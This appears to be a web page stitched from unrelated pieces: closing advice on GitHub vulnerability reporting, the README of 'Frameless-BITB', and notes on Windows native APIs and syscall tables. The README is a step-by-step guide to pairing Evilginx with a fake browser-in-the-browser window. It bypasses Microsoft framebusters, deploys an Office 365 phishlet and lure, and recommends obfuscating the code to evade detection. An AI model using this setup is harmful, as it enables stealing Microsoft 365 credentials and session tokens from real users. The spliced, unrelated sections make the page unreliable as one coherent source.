After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability.

How to make security researchers happy

If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day.

If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting.

If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.

Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. ▶ Watch Video

☕︎ Buy Me A Coffee

Video Tutorial: 👇

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to users home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener to no > DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


Windows Internals Notes

I spent some time over the Christmas break least year learning the basics of Windows Internals and thought it was a good opportunity to use my naive reverse engineering skills to find answers to my own questions. This is not a blog but rather my own notes on Windows Internals. I’ll keep updating them and adding new notes as I learn more.

Windows Native API

As mentioned on Wikipedia, several native Windows API calls are implemented in ntoskernel.exe and can be accessed from user mode through ntdll.dll. The entry point of NTDLL is LdrInitializeThunk and native API calls are handled by the Kernel via the System Service Descriptor Table (SSDT).

The native API is used early in the Windows startup process when other components or APIs are not available yet. Therefore, a few Windows components, such as the Client/Server Runtime Subsystem (CSRSS), are implemented using the Native API.  The native API is also used by subroutines from Kernel32.DLL and others to implement Windows API on which most of the Windows components are created.

The native API contains several functions, including C Runtime Function that are needed for a very basic C Runtime execution, such as strlen(); however, it lacks some other common functions or procedures such as malloc(), printf(), and scanf(). The reason for that is that malloc() does not specify which heap to use for memory allocation, and printf() and scans() use a console which can be accessed only through Kernel32.

Native API Naming Convention

Most of the native APIs have a prefix such as Nt, Zw, and Rtl etc. All the native APIs that start with Nt or Zw are system calls which are declared in ntoskernl.exe and ntdll.dll and they are identical when called from NTDLL.

  • Nt or Zw: When called from user mode (NTDLL), they execute an interrupt into kernel mode and call the equivalent function in ntoskrnl.exe via the SSDT. The only difference is that the Zw APIs ensure kernel mode when called from ntoskernl.exe, while the Nt APIs don’t.[1] 
  • Rtl: This is the second largest group of NTDLL calls. It contains the (extended) C Run-Time Library, which includes many utility functions that can be used by native applications but don’t have a direct kernel support.
  • Csr: These are client-server functions that are used to communicate with the Win32 subsystem process, csrss.exe.
  • Dbg: These are debugging functions such as a software breakpoint.
  • Ki: These are upcalls from kernel mode for events like APC dispatching.
  • Ldr: These are loader functions for Portable Executable (PE) file which are responsible for handling and starting of new processes.
  • Tp: These are for ThreadPool handling.

Figuring Out Undocumented APIs

Some of these APIs that are part of Windows Driver Kit (WDK) are documented but Microsoft does not provide documentation for rest of the native APIs. So, how can we find the definition for these APIs? How do we know what arguments we need to provide?

As we discussed earlier, these native APIs are defined in ntdll.dll and ntoskernl.exe. Let’s open it in Ghidra and see if we can find the definition for one of the native APIs, NtQueryInformationProcess().

Let’s load NTDLL in Ghidra, analyse it, and check exported functions under the Symbol tree:

Well, the function signature doesn’t look good. It looks like this API call does not accept any parameters (void) ? Well, that can’t be true, because it needs to take at least a handle to a target process.

Now, let’s load ntoskernl.exe in Ghidra and check it there.

Okay, that’s little bit better. We now at least know that it takes five arguments. But what are those arguments? Can we figure it out? Well, at least for this native API, I found its definition on MSDN here. But what if it wasn’t there? Could we still figure out the number of parameters and their data types required to call this native API?

Let’s see if we can find a header file in the Includes directory in Windows Kits (WinDBG) installation directory.

As you can see, the grep command shows the NtQueryInformationProcess() is found in two files, but the definition is found only in winternl.h.

Alas, we found the function declaration! So, now we know that it takes 3 arguments (IN) and returns values in two of the structure members (OUT), ReturnLength and ProcessInformation.

Similarly, another native API, NtOpenProcess() is not defined in NtOSKernl.exe but its declaration can be found in the Windows driver header file ntddk.h.

Note that not all Native APIs have function declarations in user mode or kernel mode header files and if I am not wrong, people may have figured them out via live debug (dynamic analysis) and/or reverse engineering.

System Service Descriptor Table (SSDT)

Windows Kernel handles system calls via SSDT and before invoking a syscall, a SysCall number is placed into EAX register (RAX in case of 64 bit systems). It then checks the KiServiceTable from Kernel’s address space for this SysCall number.

For example, SysCall number for NtOpenProcess() is 0x26. we can check this table by launching WinDBG in local kernel debug mode and using the dd nt!KiServiceTable command.

It displays a list of offsets to actual system calls, such as NtOpenProcess(). We can check the syscall number for NtOpenProcess() by making the dd command display the 0x27th entry from the start of the table (It’s 0x26 but the table index starts at 0).

As you can see, adding L27 to the dd nt!KiServiceTable command displays the offsets for up to 0x26 SysCalls in this table. We can now check if offset 05f2190 resolves to NtOpenProcess(). We can ignore the last bit of this offset, 0. This bit indicates how many stack parameters need to be cleaned up post the SysCall.

The first four parameters are usually pushed to the registers and remaining are pushed to the stack. We have just one bit to represent number of parameters that can go onto the stack, we can represent maximum 0xf parameters.

So in case of NtOpenProcess, there are no parameters on the stack that need to be cleaned up. Now let’s unassembled the instructions at nt!KiServiceTable + 05f2190 to see if this address resolves to SysCall NtOpenProcess().

References / To Do

https://en.wikipedia.org/wiki/Windows_Native_API

https://web.archive.org/web/20110119043027/http://www.codeproject.com/KB/system/Win32.aspx

https://web.archive.org/web/20070403035347/http://support.microsoft.com/kb/187674

https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

https://learn.microsoft.com/en-us/windows/win32/api/

https://techcommunity.microsoft.com/t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824

Windows Device Driver Documentation: https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/_kernel/

Process Info, PEB and TEB etc: https://www.codeproject.com/Articles/19685/Get-Process-Info-with-NtQueryInformationProcess

https://www.microsoftpressstore.com/articles/article.aspx?p=2233328

Offensive Windows Attack Techniques: https://attack.mitre.org/techniques/enterprise/

https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/exploring-process-environment-block

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Masquerade-PEB.ps1

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

Windows Drivers Reverse Engineering Methodology

❌